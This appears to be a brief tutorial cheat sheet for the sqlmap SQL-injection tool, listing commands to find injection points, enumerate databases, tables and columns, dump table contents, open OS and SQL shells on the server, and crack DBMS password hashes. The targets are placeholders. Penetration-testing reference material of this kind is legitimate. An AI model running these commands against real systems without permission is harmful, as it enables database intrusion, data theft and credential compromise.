Basic sqlmap
Running sqlmap against GET parameters
Finding injection points and the database type
sqlmap -u "target_url" -b
e.g.
sqlmap -u "http://test.com/index.php?user=abcd" -b
-b = Retrieve the DBMS banner: tries to get information about the underlying database. The output lists the injection points found and the database type.
Finding the current database user
sqlmap -u "target_url" --current-user
To get an interactive operating system shell on the database server
sqlmap -u "target_url" --os-shell
Forcing the database type
sqlmap -u "target_url" --dbms=[database type]
To have sqlmap guide you through the process:
sqlmap --wizard
Running sqlmap against POST parameters
sqlmap -u "target_url" --data="author=admin" -b
e.g.
sqlmap -u "http://test.com/index.php" --data="author=admin" -b
Getting a list of the databases present on the remote system
sqlmap -u "target_url" --dbs
Finding the tables that exist in a database
sqlmap -u "target_url" --tables -D database_name
Getting the columns from a table
sqlmap -u "target_url" --columns -D database_name -T table_name
Dumping data from a table
sqlmap -u "target_url" --dump -D database_name -T table_name
To start an interactive SQL shell
sqlmap -u "target_url" --sql-shell -D database_name -T table_name
To enumerate the DBMS users' password hashes and attempt to crack them
sqlmap -u "target_url" --passwords -D database_name -T table_name
To search for common table names
sqlmap -u "target_url" --common-tables -D database_name